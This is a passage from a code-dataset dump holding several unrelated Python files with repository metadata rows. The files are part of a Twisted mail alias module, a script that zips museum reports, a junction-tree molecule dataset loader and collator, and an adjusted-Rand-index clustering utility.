            provider, (1) L{bytes}
        @param args: Arguments for L{AliasBase.__init__}.
        """
        AliasBase.__init__(self, *args)
        self.alias = smtp.Address(alias)

    def __str__(self):
        """
        Build a string representation of this L{AddressAlias} instance.

        @rtype: L{bytes}
        @return: A string containing the destination address.
        """
        return '<Address %s>' % (self.alias,)

    def createMessageReceiver(self):
        """
        Create a message receiver which delivers a message to
        the destination address.

        @rtype: L{IMessage <smtp.IMessage>} provider
        @return: A message receiver.
        """
        return self.domain().exists(str(self.alias))

    def resolve(self, aliasmap, memo=None):
        """
        Map this alias to its ultimate destination.

        @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
        @param aliasmap: A mapping of username to alias or group of aliases.

        @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
        @param memo: A record of the aliases already considered in the
            resolution process.  If provided, C{memo} is modified to include
            this alias.

        @rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>}
        @return: A message receiver for the ultimate destination or None for
            an invalid destination.
        """
        if memo is None:
            memo = {}
        if str(self) in memo:
            # Cycle guard: this alias was already visited in this pass.
            return None
        memo[str(self)] = None
        try:
            # Ask the destination domain directly.  NOTE(review): the result
            # of exists() is immediately called here -- confirm against the
            # IDomain.exists contract that it returns a receiver factory.
            return self.domain().exists(smtp.User(self.alias, None, None, None), memo)()
        except smtp.SMTPBadRcpt:
            pass
        if self.alias.local in aliasmap:
            # Unknown to the domain; fall back to the alias map.
            return aliasmap[self.alias.local].resolve(aliasmap, memo)
        return None
class FileWrapper:
    """
    A message receiver which delivers a message to a file.

    The message is buffered in a temporary file and appended to the final
    file only once the whole message has been received.

    @type fp: file-like object
    @ivar fp: A file used for temporary storage of the message.

    @type finalname: L{bytes}
    @ivar finalname: The name of the file in which the message should be
        stored.
    """
    implements(smtp.IMessage)

    def __init__(self, filename):
        """
        @type filename: L{bytes}
        @param filename: The name of the file in which the message should be
            stored.
        """
        self.fp = tempfile.TemporaryFile()
        self.finalname = filename

    def lineReceived(self, line):
        """
        Write a received line to the temporary file.

        @type line: L{bytes}
        @param line: A received line of the message.
        """
        self.fp.write(line + '\n')

    def eomReceived(self):
        """
        Handle end of message by writing the message to the file.

        @rtype: L{Deferred <defer.Deferred>} which successfully results in
            L{bytes}
        @return: A deferred which succeeds with the name of the file to which
            the message has been stored or fails if the message cannot be
            saved to the file.
        """
        self.fp.seek(0, 0)
        try:
            # open() instead of the Python-2-only file() builtin.
            f = open(self.finalname, 'a')
        except Exception:
            # Exception instead of a bare except: so KeyboardInterrupt and
            # SystemExit are not converted into a failed Deferred.
            return defer.fail(failure.Failure())
        try:
            f.write(self.fp.read())
        finally:
            # Close the destination file even if the write fails.
            f.close()
        self.fp.close()
        return defer.succeed(self.finalname)

    def connectionLost(self):
        """
        Close the temporary file when the connection is lost.
        """
        self.fp.close()
        self.fp = None

    def __str__(self):
        """
        Build a string representation of this L{FileWrapper} instance.

        @rtype: L{bytes}
        @return: A string containing the file name of the message.
        """
        return '<FileWrapper %s>' % (self.finalname,)
class FileAlias(AliasBase):
    """
    An alias which translates an address to a file.

    @ivar filename: See L{__init__}.
    """
    implements(IAlias)

    def __init__(self, filename, *args):
        """
        @type filename: L{bytes}
        @param filename: The name of the file in which to store the message.

        @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
            provider, (1) L{bytes}
        @param args: Arguments for L{AliasBase.__init__}.
        """
        AliasBase.__init__(self, *args)
        self.filename = filename

    def __str__(self):
        """
        Build a string representation of this L{FileAlias} instance.

        @rtype: L{bytes}
        @return: A string containing the name of the file.
        """
        return '<File %s>' % (self.filename,)

    def createMessageReceiver(self):
        """
        Create a message receiver which delivers a message to the file.

        @rtype: L{FileWrapper}
        @return: A message receiver which writes a message to the file.
        """
        return FileWrapper(self.filename)
class ProcessAliasTimeout(Exception):
    """
    An error indicating that a timeout occurred while waiting for a process
    to complete.
    """
class MessageWrapper:
    """
    A message receiver which delivers a message to a child process.

    @type completionTimeout: L{int} or L{float}
    @ivar completionTimeout: The number of seconds to wait for the child
        process to exit before reporting the delivery as a failure.

    @type _timeoutCallID: L{NoneType <types.NoneType>} or
        L{IDelayedCall <twisted.internet.interfaces.IDelayedCall>} provider
    @ivar _timeoutCallID: The call used to time out delivery, started when the
        connection to the child process is closed.

    @type done: L{bool}
    @ivar done: A flag indicating whether the child process has exited
        (C{True}) or not (C{False}).

    @type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>}
        provider
    @ivar reactor: A reactor which will be used to schedule timeouts.

    @ivar protocol: See L{__init__}.

    @type processName: L{bytes} or L{NoneType <types.NoneType>}
    @ivar processName: The process name.

    @type completion: L{Deferred <defer.Deferred>}
    @ivar completion: The deferred which will be triggered by the protocol
        when the child process exits.
    """
    implements(smtp.IMessage)

    done = False

    completionTimeout = 60
    _timeoutCallID = None

    reactor = reactor

    def __init__(self, protocol, process=None, reactor=None):
        """
        @type protocol: L{ProcessAliasProtocol}
        @param protocol: The protocol associated with the child process.

        @type process: L{bytes} or L{NoneType <types.NoneType>}
        @param process: The process name.

        @type reactor: L{NoneType <types.NoneType>} or L{IReactorTime
            <twisted.internet.interfaces.IReactorTime>} provider
        @param reactor: A reactor which will be used to schedule timeouts.
        """
        self.processName = process
        self.protocol = protocol
        self.completion = defer.Deferred()
        # The protocol errbacks self.completion when the process exits;
        # _processEnded then decides whether that exit was expected.
        self.protocol.onEnd = self.completion
        self.completion.addBoth(self._processEnded)

        if reactor is not None:
            self.reactor = reactor

    def _processEnded(self, result):
        """
        Record process termination and cancel the timeout call if it is active.

        @type result: L{Failure <failure.Failure>}
        @param result: The reason the child process terminated.

        @rtype: L{NoneType <types.NoneType>} or
            L{Failure <failure.Failure>}
        @return: None, if the process end is expected, or the reason the child
            process terminated, if the process end is unexpected.
        """
        self.done = True
        if self._timeoutCallID is not None:
            # eomReceived was called, we're actually waiting for the process to
            # exit.
            self._timeoutCallID.cancel()
            self._timeoutCallID = None
        else:
            # eomReceived was not called, this is unexpected, propagate the
            # error.
            return result

    def lineReceived(self, line):
        """
        Write a received line to the child process.

        @type line: L{bytes}
        @param line: A received line of the message.
        """
        if self.done:
            # The process has already exited; silently drop further lines.
            return
        self.protocol.transport.write(line + '\n')

    def eomReceived(self):
        """
        Disconnect from the child process and set up a timeout to wait for it
        to exit.

        @rtype: L{Deferred <defer.Deferred>}
        @return: A deferred which will be called back when the child process
            exits.
        """
        if not self.done:
            self.protocol.transport.loseConnection()
            self._timeoutCallID = self.reactor.callLater(
                self.completionTimeout, self._completionCancel)
        return self.completion

    def _completionCancel(self):
        """
        Handle the expiration of the timeout for the child process to exit by
        terminating the child process forcefully and issuing a failure to the
        L{completion} deferred.
        """
        self._timeoutCallID = None
        self.protocol.transport.signalProcess('KILL')
        exc = ProcessAliasTimeout(
            "No answer after %s seconds" % (self.completionTimeout,))
        # Detach the protocol so the forced exit does not errback completion
        # a second time through onEnd.
        self.protocol.onEnd = None
        self.completion.errback(failure.Failure(exc))

    def connectionLost(self):
        """
        Ignore notification of lost connection.
        """

    def __str__(self):
        """
        Build a string representation of this L{MessageWrapper} instance.

        @rtype: L{bytes}
        @return: A string containing the name of the process.
        """
        return '<ProcessWrapper %s>' % (self.processName,)
class ProcessAliasProtocol(protocol.ProcessProtocol):
    """
    A process protocol which errbacks a deferred when the associated
    process ends.

    @type onEnd: L{NoneType <types.NoneType>} or L{Deferred <defer.Deferred>}
    @ivar onEnd: If set, a deferred on which to errback when the process ends.
    """
    onEnd = None

    def processEnded(self, reason):
        """
        Call an errback.

        @type reason: L{Failure <failure.Failure>}
        @param reason: The reason the child process terminated.
        """
        if self.onEnd is not None:
            self.onEnd.errback(reason)
class ProcessAlias(AliasBase):
    """
    An alias which is handled by the execution of a program.

    @type path: L{list} of L{bytes}
    @ivar path: The arguments to pass to the process. The first string is
        the executable's name.

    @type program: L{bytes}
    @ivar program: The path of the program to be executed.

    @type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>}
        and L{IReactorProcess <twisted.internet.interfaces.IReactorProcess>}
        provider
    @ivar reactor: A reactor which will be used to create and timeout the
        child process.
    """
    implements(IAlias)

    reactor = reactor

    def __init__(self, path, *args):
        """
        @type path: L{bytes}
        @param path: The command to invoke the program consisting of the path
            to the executable followed by any arguments.

        @type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
            provider, (1) L{bytes}
        @param args: Arguments for L{AliasBase.__init__}.
        """
        AliasBase.__init__(self, *args)
        self.path = path.split()
        self.program = self.path[0]

    def __str__(self):
        """
        Build a string representation of this L{ProcessAlias} instance.

        @rtype: L{bytes}
        @return: A string containing the command used to invoke the process.
        """
        return '<Process %s>' % (self.path,)

    def spawnProcess(self, proto, program, path):
        """
        Spawn a process.

        This wraps the L{spawnProcess
        <twisted.internet.interfaces.IReactorProcess.spawnProcess>} method on
        L{reactor} so that it can be customized for test purposes.

        @type proto: L{IProcessProtocol
            <twisted.internet.interfaces.IProcessProtocol>} provider
        @param proto: An object which will be notified of all events related to
            the created process.

        @type program: L{bytes}
        @param program: The full path name of the file to execute.

        @type path: L{list} of L{bytes}
        @param path: The arguments to pass to the process. The first string
            should be the executable's name.

        @rtype: L{IProcessTransport
            <twisted.internet.interfaces.IProcessTransport>} provider
        @return: A process transport.
        """
        return self.reactor.spawnProcess(proto, program, path)

    def createMessageReceiver(self):
        """
        Launch a process and create a message receiver to pass a message
        to the process.

        @rtype: L{MessageWrapper}
        @return: A message receiver which delivers a message to the process.
        """
        p = ProcessAliasProtocol()
        m = MessageWrapper(p, self.program, self.reactor)
        # The transport returned by spawnProcess is reachable through the
        # protocol; the previously-bound unused local has been removed.
        self.spawnProcess(p, self.program, self.path)
        return m
class MultiWrapper:
    """
    A message receiver which delivers a single message to multiple other
    message receivers.

    @ivar objs: See L{__init__}.
    """
    implements(smtp.IMessage)

    def __init__(self, objs):
        """
        @type objs: L{list} of L{IMessage <smtp.IMessage>} provider
        @param objs: Message receivers to which the incoming message should be
            directed.
        """
        self.objs = objs

    def lineReceived(self, line):
        """
        Pass a received line to the message receivers.

        @type line: L{bytes}
        @param line: A line of the message.
        """
        for o in self.objs:
            o.lineReceived(line)

    def eomReceived(self):
        """
        Pass the end of message along to the message receivers.

        @rtype: L{DeferredList <defer.DeferredList>} whose successful results
            are L{bytes} or L{NoneType <types.NoneType>}
        @return: A deferred list which triggers when all of the message
            receivers have finished handling their end of message.
        """
        return defer.DeferredList([
            o.eomReceived() for o in self.objs
        ])

    def connectionLost(self):
        """
        Inform the message receivers that the connection has been lost.
        """
        for o in self.objs:
            o.connectionLost()

    def __str__(self):
        """
        Build a string representation of this L{MultiWrapper} instance.

        @rtype: L{bytes}
        @return: A string containing a list of the message receivers.
        """
        # list(...) so the receivers are shown on Python 3, where a bare
        # map() would render as '<map object at 0x...>'.
        return '<GroupWrapper %r>' % (list(map(str, self.objs)),)
class AliasGroup(AliasBase):
    """
    An alias which points to multiple destination aliases.

    @type processAliasFactory: no-argument callable which returns
        L{ProcessAlias}
    @ivar processAliasFactory: A factory for process aliases.

    @type aliases: L{list} of L{AliasBase} which implements L{IAlias}
    @ivar aliases: The destination aliases.
    """
    implements(IAlias)

    processAliasFactory = ProcessAlias

    def __init__(self, items, *args):
        """
        Create a group of aliases.

        Parse a list of alias strings and, for each, create an appropriate
        alias object.

        @type items: L{list} of L{bytes}
        @param items: Aliases.

        @type args: n-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
            provider, (1) L{bytes}
        @param args: Arguments for L{AliasBase.__init__}.
        """
        AliasBase.__init__(self, *args)
        self.aliases = []
        while items:
            addr = items.pop().strip()
            if addr.startswith(':'):
                # ':' prefix: the rest is a file containing more aliases.
                try:
                    # open() instead of the Python-2-only file() builtin;
                    # Exception instead of a bare except: so interrupts
                    # still propagate.
                    f = open(addr[1:])
                except Exception:
                    log.err("Invalid filename in alias file %r" % (addr[1:],))
                else:
                    addr = ' '.join([l.strip() for l in f])
                    items.extend(addr.split(','))
            elif addr.startswith('|'):
                # '|' prefix: deliver by piping the message to a program.
                self.aliases.append(self.processAliasFactory(addr[1:], *args))
            elif addr.startswith('/'):
                # '/' prefix: deliver by appending to a file.
                if os.path.isdir(addr):
                    log.err("Directory delivery not supported")
                else:
                    self.aliases.append(FileAlias(addr, *args))
            else:
                # Otherwise treat it as a plain email address.
                self.aliases.append(AddressAlias(addr, *args))

    def __len__(self):
        """
        Return the number of aliases in the group.

        @rtype: L{int}
        @return: The number of aliases in the group.
        """
        return len(self.aliases)

    def __str__(self):
        """
        Build a string representation of this L{AliasGroup} instance.

        @rtype: L{bytes}
        @return: A string containing the aliases in the group.
        """
        return '<AliasGroup [%s]>' % (', '.join(map(str, self.aliases)))

    def createMessageReceiver(self):
        """
        Create a message receiver for each alias and return a message receiver
        which will pass on a message to each of those.

        @rtype: L{MultiWrapper}
        @return: A message receiver which passes a message on to message
            receivers for each alias in the group.
        """
        return MultiWrapper([a.createMessageReceiver() for a in self.aliases])

    def resolve(self, aliasmap, memo=None):
        """
        Map each of the aliases in the group to its ultimate destination.

        @type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
        @param aliasmap: A mapping of username to alias or group of aliases.

        @type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
        @param memo: A record of the aliases already considered in the
            resolution process.  If provided, C{memo} is modified to include
            this alias.

        @rtype: L{MultiWrapper}
        @return: A message receiver which passes the message on to message
            receivers for the ultimate destination of each alias in the group.
        """
        if memo is None:
            memo = {}
        r = []
        for a in self.aliases:
            r.append(a.resolve(aliasmap, memo))
        # Materialize the filtered receivers: on Python 3, filter() returns
        # a lazy iterator which MultiWrapper.lineReceived would exhaust
        # after delivering only the first line.
        return MultiWrapper([receiver for receiver in r if receiver])
| 31.04908 | 89 | 0.592334 |
ec3661ddc38fe4da04624cb4b8f004fc142a080f | 1,350 | py | Python | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | null | null | null | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | 1 | 2021-12-07T09:47:31.000Z | 2021-12-07T09:47:31.000Z | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | null | null | null | import logging
import zipfile
import os
from config import config
# Configuration profile to use; falls back to 'default' when unset.
CONFIG_NAME = os.environ.get('CONFIG_NAME', 'default')

# filemode='w' truncates app.log on every run.
logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s : %(levelname)s : %(message)s',
                    level=logging.DEBUG)
def zip_reports(compressed_file, *args):
    """
    Create a compressed zip archive of report files from the report directory.

    :param compressed_file: name of the zip file to be created.
    :param args: names of the files (looked up in the configured REPORT_DIR)
        to compress into the archive.  Missing files are logged and skipped.
    """
    # Resolve the report directory once instead of on every iteration.
    report_dir = config[CONFIG_NAME].REPORT_DIR
    try:
        with zipfile.ZipFile(compressed_file, 'w') as zipped_report:
            # 'report_name' instead of 'file' to avoid shadowing a builtin.
            for report_name in args:
                file_path = os.path.join(report_dir, report_name)
                if os.path.isfile(file_path):
                    zipped_report.write(file_path,
                                        compress_type=zipfile.ZIP_DEFLATED)
                else:
                    logging.error(f"No file with filename: {report_name} exists in the {report_dir}. "
                                  f"Proceeding with other file compression")
    except OSError as error:
        # Message typo fixed ('into', not 'import'); log the exception object
        # itself -- error.args[-1] raises IndexError when args is empty.
        logging.exception(f"OSError while writing reports into a zip: {error}")
if __name__ == '__main__':
    # Ad-hoc invocation: bundle the museum reports into reports.zip.
    zip_reports('reports.zip', 'museum.csv', 'museum.html', 'museum.pdf', 'museum.xml')
| 38.571429 | 115 | 0.624444 |
53449c2f118c7bdd197f5c421c9a494a06a7fff1 | 8,993 | py | Python | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
] | 1 | 2020-06-22T19:19:24.000Z | 2020-06-22T19:19:24.000Z | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
] | null | null | null | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import dgl
import os
import torch
from dgl.data.utils import download, extract_archive, get_download_dir
from torch.utils.data import Dataset
from .mol_tree import Vocab, DGLMolTree
from .chemutils import mol2dgl_dec, mol2dgl_enc
ELEM_LIST = ['C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg', 'Na', 'Ca',
'Fe', 'Al', 'I', 'B', 'K', 'Se', 'Zn', 'H', 'Cu', 'Mn', 'unknown']
ATOM_FDIM_DEC = len(ELEM_LIST) + 6 + 5 + 1
BOND_FDIM_DEC = 5
MAX_NB = 10
PAPER = os.getenv('PAPER', False)
_url = 'https://s3-ap-southeast-1.amazonaws.com/dgl-data-cn/dataset/jtnn.zip'
def _unpack_field(examples, field):
return [e[field] for e in examples]
def _set_node_id(mol_tree, vocab):
wid = []
for i, node in enumerate(mol_tree.nodes_dict):
mol_tree.nodes_dict[node]['idx'] = i
wid.append(vocab.get_index(mol_tree.nodes_dict[node]['smiles']))
return wid
class JTNNDataset(Dataset):
    # Molecule dataset for the junction-tree model.  Downloads the packaged
    # data archive on construction, then serves per-molecule junction trees
    # plus pre-built DGL graphs for the encoder and (in training mode) the
    # decoder's candidate/stereoisomer scoring.
    def __init__(self, data, vocab, training=True):
        self.dir = get_download_dir()
        self.zip_file_path='{}/jtnn.zip'.format(self.dir)

        download(_url, path=self.zip_file_path)
        extract_archive(self.zip_file_path, '{}/jtnn'.format(self.dir))
        print('Loading data...')
        # 'train'/'test' select the bundled splits; any other value is taken
        # as a path to a user-supplied SMILES file.
        if data in ['train', 'test']:
            data_file = '{}/jtnn/{}.txt'.format(self.dir, data)
        else:
            data_file = data
        with open(data_file) as f:
            # One molecule per line; keep only the first whitespace token
            # (the SMILES string).
            self.data = [line.strip("\r\n ").split()[0] for line in f]
        self.vocab_file = '{}/jtnn/{}.txt'.format(self.dir, vocab)
        print('Loading finished.')
        print('\tNum samples:', len(self.data))
        print('\tVocab file:', self.vocab_file)
        self.training = training
        # NOTE(review): the vocab file handle is never closed explicitly;
        # relies on garbage collection.
        self.vocab = Vocab([x.strip("\r\n ") for x in open(self.vocab_file)])

    def __len__(self):
        # Number of molecules (SMILES strings) in the selected split.
        return len(self.data)

    def __getitem__(self, idx):
        smiles = self.data[idx]
        mol_tree = DGLMolTree(smiles)
        mol_tree.recover()
        mol_tree.assemble()

        wid = _set_node_id(mol_tree, self.vocab)

        # prebuild the molecule graph
        mol_graph, atom_x_enc, bond_x_enc = mol2dgl_enc(mol_tree.smiles)

        result = {
            'mol_tree': mol_tree,
            'mol_graph': mol_graph,
            'atom_x_enc': atom_x_enc,
            'bond_x_enc': bond_x_enc,
            'wid': wid,
        }

        # Inference only needs the tree and the molecule graph.
        if not self.training:
            return result

        # prebuild the candidate graph list
        cands = []
        for node_id, node in mol_tree.nodes_dict.items():
            # fill in ground truth
            if node['label'] not in node['cands']:
                node['cands'].append(node['label'])
                node['cand_mols'].append(node['label_mol'])

            # Skip nodes with nothing to discriminate between.
            if node['is_leaf'] or len(node['cands']) == 1:
                continue
            cands.extend([(cand, mol_tree, node_id)
                          for cand in node['cand_mols']])
        if len(cands) > 0:
            cand_graphs, atom_x_dec, bond_x_dec, tree_mess_src_e, \
                tree_mess_tgt_e, tree_mess_tgt_n = mol2dgl_dec(cands)
        else:
            # No assembly candidates: emit empty tensors of the decoder's
            # feature widths so the collator can concatenate uniformly.
            cand_graphs = []
            atom_x_dec = torch.zeros(0, ATOM_FDIM_DEC)
            bond_x_dec = torch.zeros(0, BOND_FDIM_DEC)
            tree_mess_src_e = torch.zeros(0, 2).long()
            tree_mess_tgt_e = torch.zeros(0, 2).long()
            tree_mess_tgt_n = torch.zeros(0).long()

        # prebuild the stereoisomers
        cands = mol_tree.stereo_cands
        if len(cands) > 1:
            if mol_tree.smiles3D not in cands:
                cands.append(mol_tree.smiles3D)

            stereo_graphs = [mol2dgl_enc(c) for c in cands]
            stereo_cand_graphs, stereo_atom_x_enc, stereo_bond_x_enc = \
                zip(*stereo_graphs)
            stereo_atom_x_enc = torch.cat(stereo_atom_x_enc)
            stereo_bond_x_enc = torch.cat(stereo_bond_x_enc)
            # (index of the true stereoisomer, number of candidates)
            stereo_cand_label = [(cands.index(mol_tree.smiles3D), len(cands))]
        else:
            # A single stereoisomer gives no training signal.
            stereo_cand_graphs = []
            stereo_atom_x_enc = torch.zeros(0, atom_x_enc.shape[1])
            stereo_bond_x_enc = torch.zeros(0, bond_x_enc.shape[1])
            stereo_cand_label = []

        result.update({
            'cand_graphs': cand_graphs,
            'atom_x_dec': atom_x_dec,
            'bond_x_dec': bond_x_dec,
            'tree_mess_src_e': tree_mess_src_e,
            'tree_mess_tgt_e': tree_mess_tgt_e,
            'tree_mess_tgt_n': tree_mess_tgt_n,
            'stereo_cand_graphs': stereo_cand_graphs,
            'stereo_atom_x_enc': stereo_atom_x_enc,
            'stereo_bond_x_enc': stereo_bond_x_enc,
            'stereo_cand_label': stereo_cand_label,
        })
        return result
class JTNNCollator(object):
def __init__(self, vocab, training):
    # vocab: cluster vocabulary shared with the dataset.
    # training: when True, __call__ also batches the candidate and
    # stereoisomer graphs produced by the dataset in training mode.
    self.vocab = vocab
    self.training = training
@staticmethod
def _batch_and_set(graphs, atom_x, bond_x, flatten):
    # Batch a (possibly nested) list of DGL graphs into a single graph and
    # attach the pre-computed atom features to nodes and bond features to
    # edges.
    if flatten:
        # graphs is a list of lists; flatten one level first.
        graphs = [g for f in graphs for g in f]
    graph_batch = dgl.batch(graphs)
    graph_batch.ndata['x'] = atom_x
    graph_batch.edata.update({
        'x': bond_x,
        # One zero row per edge, with the atom-feature width; presumably a
        # placeholder filled in by the network later -- TODO confirm.
        'src_x': atom_x.new(bond_x.shape[0], atom_x.shape[1]).zero_(),
    })
    return graph_batch
def __call__(self, examples):
# get list of trees
mol_trees = _unpack_field(examples, 'mol_tree')
wid = _unpack_field(examples, 'wid')
for _wid, mol_tree in zip(wid, mol_trees):
mol_tree.ndata['wid'] = torch.LongTensor(_wid)
# TODO: either support pickling or get around ctypes pointers using scipy
# batch molecule graphs
mol_graphs = _unpack_field(examples, 'mol_graph')
atom_x = torch.cat(_unpack_field(examples, 'atom_x_enc'))
bond_x = torch.cat(_unpack_field(examples, 'bond_x_enc'))
mol_graph_batch = self._batch_and_set(mol_graphs, atom_x, bond_x, False)
result = {
'mol_trees': mol_trees,
'mol_graph_batch': mol_graph_batch,
}
if not self.training:
return result
# batch candidate graphs
cand_graphs = _unpack_field(examples, 'cand_graphs')
cand_batch_idx = []
atom_x = torch.cat(_unpack_field(examples, 'atom_x_dec'))
bond_x = torch.cat(_unpack_field(examples, 'bond_x_dec'))
tree_mess_src_e = _unpack_field(examples, 'tree_mess_src_e')
tree_mess_tgt_e = _unpack_field(examples, 'tree_mess_tgt_e')
tree_mess_tgt_n = _unpack_field(examples, 'tree_mess_tgt_n')
n_graph_nodes = 0
n_tree_nodes = 0
for i in range(len(cand_graphs)):
tree_mess_tgt_e[i] += n_graph_nodes
tree_mess_src_e[i] += n_tree_nodes
tree_mess_tgt_n[i] += n_graph_nodes
n_graph_nodes += sum(g.number_of_nodes() for g in cand_graphs[i])
n_tree_nodes += mol_trees[i].number_of_nodes()
cand_batch_idx.extend([i] * len(cand_graphs[i]))
tree_mess_tgt_e = torch.cat(tree_mess_tgt_e)
tree_mess_src_e = torch.cat(tree_mess_src_e)
tree_mess_tgt_n = torch.cat(tree_mess_tgt_n)
cand_graph_batch = self._batch_and_set(cand_graphs, atom_x, bond_x, True)
# batch stereoisomers
stereo_cand_graphs = _unpack_field(examples, 'stereo_cand_graphs')
atom_x = torch.cat(_unpack_field(examples, 'stereo_atom_x_enc'))
bond_x = torch.cat(_unpack_field(examples, 'stereo_bond_x_enc'))
stereo_cand_batch_idx = []
for i in range(len(stereo_cand_graphs)):
stereo_cand_batch_idx.extend([i] * len(stereo_cand_graphs[i]))
if len(stereo_cand_batch_idx) > 0:
stereo_cand_labels = [
(label, length)
for ex in _unpack_field(examples, 'stereo_cand_label')
for label, length in ex
]
stereo_cand_labels, stereo_cand_lengths = zip(*stereo_cand_labels)
stereo_cand_graph_batch = self._batch_and_set(
stereo_cand_graphs, atom_x, bond_x, True)
else:
stereo_cand_labels = []
stereo_cand_lengths = []
stereo_cand_graph_batch = None
stereo_cand_batch_idx = []
result.update({
'cand_graph_batch': cand_graph_batch,
'cand_batch_idx': cand_batch_idx,
'tree_mess_tgt_e': tree_mess_tgt_e,
'tree_mess_src_e': tree_mess_src_e,
'tree_mess_tgt_n': tree_mess_tgt_n,
'stereo_cand_graph_batch': stereo_cand_graph_batch,
'stereo_cand_batch_idx': stereo_cand_batch_idx,
'stereo_cand_labels': stereo_cand_labels,
'stereo_cand_lengths': stereo_cand_lengths,
})
return result
| 37.785714 | 81 | 0.603136 |
e0a5b48147e5339d4b061e16b74df66abe2ffbc1 | 8,727 | py | Python | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 207 | 2015-09-23T08:35:22.000Z | 2021-11-24T23:05:55.000Z | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 52 | 2015-09-18T21:19:54.000Z | 2018-12-15T21:17:32.000Z | src/utils/convergence_test_utils.py | vishalbelsare/crosscat | 1f2ac5a43a50ebd7aaa89f0c5ac3815a170848c5 | [
"Apache-2.0"
] | 33 | 2015-10-30T22:50:30.000Z | 2020-07-01T00:29:55.000Z | #
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Lead Developers: Dan Lovell and Jay Baxter
# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka
# Research Leads: Vikash Mansinghka, Patrick Shafto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy
#
import crosscat.cython_code.State as State
import crosscat.utils.general_utils as gu
import crosscat.utils.sample_utils as su
def calc_ari(group_idx_list_1, group_idx_list_2):
    """Compute the Adjusted Rand Index (ARI) between two flat clusterings.

    Args:
        group_idx_list_1: sequence of cluster labels, one per item.
        group_idx_list_2: sequence of cluster labels for the same items.

    Returns:
        The ARI; 1.0 indicates identical partitions (up to relabeling).

    The original built the label->indices maps via `map()` called purely for
    its side effects, which is a no-op on Python 3 (lazy map); an explicit
    loop is used instead. The helper parameter shadowing the builtin `list`
    was also renamed.
    """
    from collections import defaultdict

    def make_set_dict(labels):
        # Map each cluster label to the set of item indices carrying it.
        set_dict = defaultdict(set)
        for idx, group in enumerate(labels):
            set_dict[group].add(idx)
        return set_dict

    def check_short_circuit(set_dict_1, list_1, set_dict_2, list_2):
        # ARI is 1.0 by definition when both partitions are all singletons,
        # or both are a single cluster: identical degenerate structure.
        both_all_apart = len(set_dict_1) == len(list_1) and \
            len(set_dict_2) == len(list_2)
        both_all_together = len(set_dict_1) == 1 and len(set_dict_2) == 1
        return both_all_apart or both_all_together

    def gen_contingency_data(set_dict_1, set_dict_2):
        ##https://en.wikipedia.org/wiki/Rand_index#The_contingency_table
        array_dim = (len(set_dict_1), len(set_dict_2))
        Ns = numpy.ndarray(array_dim)
        for idx_1, value1 in enumerate(set_dict_1.values()):
            for idx_2, value2 in enumerate(set_dict_2.values()):
                Ns[idx_1, idx_2] = len(value1.intersection(value2))
        As = Ns.sum(axis=1)
        Bs = Ns.sum(axis=0)
        return Ns, As, Bs

    def choose_2_sum(x):
        # Sum of (x_i choose 2) over all entries of x.
        return sum(x * (x - 1) / 2.0)

    group_idx_dict_1 = make_set_dict(group_idx_list_1)
    group_idx_dict_2 = make_set_dict(group_idx_list_2)
    if check_short_circuit(group_idx_dict_1, group_idx_list_1,
                           group_idx_dict_2, group_idx_list_2):
        return 1.0
    Ns, As, Bs = gen_contingency_data(group_idx_dict_1, group_idx_dict_2)
    n_choose_2 = choose_2_sum(numpy.array([len(group_idx_list_1)]))
    # Only entries > 1 contribute, since (0 choose 2) == (1 choose 2) == 0.
    cross_sums = choose_2_sum(Ns[Ns > 1])
    a_sums = choose_2_sum(As)
    b_sums = choose_2_sum(Bs)
    numerator = n_choose_2 * cross_sums - a_sums * b_sums
    denominator = .5 * n_choose_2 * (a_sums + b_sums) - a_sums * b_sums
    return numerator / denominator
def determine_synthetic_column_ground_truth_assignments(num_cols, num_views):
    """Return the ground-truth view index for each of num_cols columns.

    Columns are split evenly across views: the first num_cols // num_views
    columns belong to view 0, the next to view 1, and so on. Uses floor
    division so the result is correct on Python 3 as well (true division
    would yield a float and break list repetition).
    """
    num_cols_per_view = num_cols // num_views
    view_assignments = []
    for view_idx in range(num_views):
        view_assignments.extend([view_idx] * num_cols_per_view)
    return view_assignments
